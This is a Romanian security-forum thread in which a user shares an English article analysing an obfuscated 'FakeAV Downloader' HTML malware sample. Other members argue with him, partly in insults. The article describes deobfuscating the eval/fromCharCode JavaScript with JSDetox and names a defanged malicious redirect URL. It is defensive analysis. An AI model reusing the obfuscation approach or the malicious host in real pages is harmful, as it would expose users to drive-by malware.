Aerosol Posted February 25, 2015 Report Posted February 25, 2015 Summary:1. Thanks for the sample file(s)2. First view3. Second view4. MoreRead more: http://dl.packetstormsecurity.net/papers/virus/fakeav-downloader-analysis.pdf Quote
Guest Posted February 28, 2015 Report Posted February 28, 2015 (edited) Summary:1. Thanks for the sample file(s)2. First view3. Second view4. MoreRead more: http://dl.packetstormsecurity.net/papers/virus/fakeav-downloader-analysis.pdfWTF man ... hai ca incep sa le dau dreptate astora care spun ca postezi sa te afli bagat in seama. Ce cacat de topic e asta cu 4 randuri in el ?Pune si tu un intel basic despre subiectul pe care-l prezinti, ce-ai facut tu acum e bataie de joc, dupa cum vad eu.No offence, dar e prea de tot.E ca si cum ar aparea o strie despre cartofi cu branza si in loc sa va povestesc aici, fac un topic cu:1. Du-te pe google.ro2. Scrii cartofi cu branza3. Citesti stirea de pe timpul.md.Google. Edited February 28, 2015 by AGSQ Quote
Aerosol Posted February 28, 2015 Author Report Posted February 28, 2015 (edited) @AGSQ apropo daca citeai articolul vedeai ca nu e o stire + e un document .PDF nu stateam sa fac screen doar pentru a putea tu sa citesti articolul pe rst fara sa dai click pe link. ( incearca sa nu postezi doar ca sa te afli in treaba. ) Edited February 28, 2015 by Aerosol Quote
Guest Posted February 28, 2015 Report Posted February 28, 2015 @AGSQ eu am pus link-ul pentru cine e interesat.Daca nu te intereseaza te rog sa nu comentezi.Multumesc.Omule, esti copac ?Ideea de a posta ceva, de a share-ui ceva cu userii de pe forum este sa le dai cat mai multe informatii despre lucrul ala. Iti era greu sa dai un copy-paste la ce e in PDF-ul ala, iar apoi sa aranjezi post-ul frumos cu imaginile respective ?Nu vreau sa o iei personal, la urma urmei n-am nimic cu tine, poti sa crapi maine ca n-o sa incep sa plang dupa tine, dar ideea era ca faci posturi de-ampulea doar ca sa fie la numar.Ofera informatii daca ai de oferit, daca nu abtine-te. Este destul de urat si deranjant, mai ales pentru cei care avem RSS activ.PS: O gluma destul de buna: Quote
Aerosol Posted February 28, 2015 Author Report Posted February 28, 2015 (edited) 1. Thanks for the sample file(s)After writing my last article about malware analysis for Android[1], I decide to check some threats that may come fromwebpages. Today we can see more advertisement on web than it was few years ago. In case of malicious pages,“advertisements” added there now, more often probably will try to steal your data by installing some malware on yourcomputer or by redirecting you to webpage containing exploit code for your browser(‘s plugin).Few nice examples of ‘webpages’ like this, I found (again) on great Mila’s blog[0]. Thank’s again! (Hint: Don’t ask me for the password. Ask Mila via email.)Let’s check the first one archive with HTML file, named “FakeAV Downloader”.2. First ViewAfter unpacking our HTML sample, we can see that index.html file contains HTML and JavaScript codeLet’s copy the JavaScript code to new file, and save it as “ob1.html”. Now we can clean the code a little bit to see whatis going on here:As you can see, JS code is preparing “eval()” and “fromCharCode()” to use it later (with “n”):3. Second viewWhen I was trying to figure out how to deobfuscate this code, I found a link to very nice tool called JSDetox[2]. You caninstall it on Kali[4], but if there will be any problem with installation by “bundler”, try to install each packet manually(gem). It should helps.After uploading our sample index.html to JSDetox, we can start deobfuscation (“Analyse”) and get the results in fewseconds:Now we can see where new created <iframe> tag is trying to relocate us – iframe page is located on:hxxp://hivagdy.ru/count22.php.Unfortunately, when I was checking this code, RU hostname was unavailable.After that, I found some other interesting informations, for example:a) Correlation network topology[3] This host was used for: [5]c) and one more information:So it seems now, that we have all information we need to decide that this index.html file (used in phishing campany forexample) can be very dangerous for safety of our users/clients.4. MoreAgain big thanks for the sample files! If you have more, post the link(s) on comments or send me the email with subject “MALWARE”. Please remember topack it with password ‘infected’ (zip/rar/whatever). (Without the password, email server will drop them.)Materials described here:[0] Mila’s blog – contagio[1] Android first steps in malware’s world - Haunt IT: [PL] Analiza aplikacji atticlab.bodyscanner.apk[2] JSDetox - https://github.com/svent/jsdetox[3] Exposure ISEC Lab – Exposure - Malicious DNS world activity[4] Kali Linux – https://www.kali.org[5] http://files.deependresearch.org[6] Malware URL – http://www.malwareurl.comSourceSpecial pentru domnul @AGSQ care nu putea sa dea pe un link.Imi pare rau domnule ca mi-am permis sa pun link-ul pentru a salva 5 minute de facut screen-uri + alte 10 de editat...Sper ca acum ai inteles mai bine acest articol ( desi ma indoiesc sa fi inteles. ) Edited February 28, 2015 by Aerosol Quote
Guest Posted February 28, 2015 Report Posted February 28, 2015 Nu e vorba de salvatul timpului ci de ajutatul comunitatii. Atat pentru membrii existenti, cat si pentru cei noi, care au mai multe sanse sa gaseasca forumul dintr-un tag cloud de 500 cuvinte, in locul a 10 cuvinte.Ultimul reply. Quote
